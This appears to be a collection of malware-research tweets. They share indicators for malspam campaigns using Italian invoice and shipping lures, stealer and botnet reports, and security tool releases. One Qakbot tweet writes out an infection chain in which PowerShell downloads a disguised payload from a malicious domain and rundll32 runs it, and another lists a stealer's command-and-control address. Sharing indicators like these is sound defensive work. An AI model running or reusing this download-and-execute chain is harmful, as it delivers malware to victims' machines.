We have submitted over 800,000 unique malware samples to Hatching. We are not even close to submitting everything.

#cutwail start to spread #maldoc #ursnif Subject : Fattura BRT S.p.A. n. 3* del 25/05/22 MD5 : dda8705c963cad14435f44dd2c5c1f69 payload from : inmanagment[.]com sample : app.any.run/tasks/6272c561… virustotal.com/gui/file/b77d1… (5/59) tria.ge/220525-kfd6jad…

New #Stealer #malware called #Redox advertising via Telegram. This Stealer has tons of capabilities, more then I have been able to observe in #Redline or others. See more images in this thread: 1/x

#cutwail start to spread #maldoc Subject : Preavviso oneri doganali per spedizione DHL MD5 : c8cd88ef38e0c74a74e255df1cfb35ab payload from : consaltins[.]com sample : app.any.run/tasks/864ea9be… virustotal.com/gui/file/87b8c… (5/60) tria.ge/220607-j4l1lsg…

New release: #PEbear 0.5.5.5 - updated with bugfixes: github.com/hasherezade/pe…

#cutwail start to spread #maldoc Subject : Pagamento non avvenuto - Transazione n. * md5 : eae2fa763b7c00ca4b7d5f57c5d3ea0d payload from : dokpio[.]com sample : virustotal.com/gui/file/f2560… (3/63) tria.ge/220803-k9l38sa…

#cutwail start to spread #maldoc #svcready? Subject : Notifica cartella di pagamento n. * md5 : 5bc2a4eefe16c8465f076bdfc3d38870 payload from : zopxor[.]com sample : virustotal.com/gui/file/89d6b… (5/59) tria.ge/220809-l8jgdsa…

#cutwail start to spread #maldoc Subject : Ricevuta di pagamento - Transazione n. * md5 : 7dabbffb085d582b5bab358e7f733a55 sample : virustotal.com/gui/file/c8e23… (1/59) tria.ge/220831-l47nesc…

🔎 Have a look at my research on tracking #PrivateLoader malware distribution service. Lots of malware being dropped! 👾 bitsight.com/blog/tracking-…

Surprise! #PEbear is Open Source now! github.com/hasherezade/pe… - please check it out and let me know what do you think!

#Truebot botnet 🔦 (#Silence) 1039 bots distributed in 111 countries 🌐 At least 83 domains belong to governments and 3 are military domains (potential victims). LATAM 🔥 REF: microsoft.com/en-us/security… + Raspberry Robin > Truebot > Clop ransomware 🚨

My new article on #Rhadamanthys stealer. As always, it's a mix between a step-by-step tutorial \ training and a presentation. Some cool parts: 🗒️ Anti analysis 🗒️ Anti hooking 🗒️ Multiple Defense evasion 🗒️ SEH manipulation 🗒️ Shellcode callback execution elis531989.medium.com/dancing-with-s…

I just released a #Blockpost on my recent investigation into a highly obfuscated #Stealer Sample, which turned out to be #SectopRat / #ArechClient2. It was a wild run and I decided I want to share it with #infosec :) gi7w0rm.medium.com/a-long-way-to-…

#RaccoonStealer from otherdeed_beta (290606664) /linktr.ee/otherdeed -> Discord CDN ff7ce6bb4da1301b4a05577a8ca5e901d8469371686e273316362a3f50b4980f 2475b6b24c1117002dfdb64795080ea401a25a2a23e08f3e9f809dfaa01a05c1 C&C: 94.142.138[.]3:80 h/t 🛡️Shields ͔̤͎̝̣͈̩̤͈̭̯̪̟̻͓̪͙̼̬̠̹̙̖̫̰̪̻̦̩̻̟̦͖̲̰̘̜̣̖̤͙͖͎̻̩͍̤̱͍

#Qakbot - BB14 - .one > .cmd > .ps > .dll cmd.exe /c Open.cmd cmd.exe /K aqjPLg.cmd und powershell invoke-webrequest -uri https://ozcontests.]com/tE3xt/01.png -outfile C:\programdata\aA9Qq1dIT.jpg rundll32.exe C:\programdata\aA9Qq1dIT.jpg,Wind IOC's github.com/pr0xylife/Qakb…

Malware Families CheatSheet marcoramilli.com/2023/03/02/mal… por Marco Ramilli #malwarefamilies

#Emotet Samples bazaar.abuse.ch/browse/tag/Emo… Urls urlhaus.abuse.ch/browse/tag/emo…

Inspired by hasherezade's pe_unmapper, I published a small python tool to unmap PE memory dumps. I also added a quick check to handle Hatching's Triage memdumps. github.com/n1ght-w0lf/pe-…

To celebrate 10.000 followers on #Twitter and as a sign of appreciation to all of you, I partnered with GreyNoise. Together, we are giving away 3x 3 months access to #Greynoise #VIP. Additionally, all 3 winners will get a free Greynoise T-Shirt ! Rules below: 1/2

New #Blogpost: "Uncovering DDGroup - A long time threat actor" From researching an attack method using search-ms to revealing a #TA active since at least 2019. - Mentioned (not named) in several reports - more than 110 #C2 addresses spanning over 94 IP gi7w0rm.medium.com/uncovering-ddg…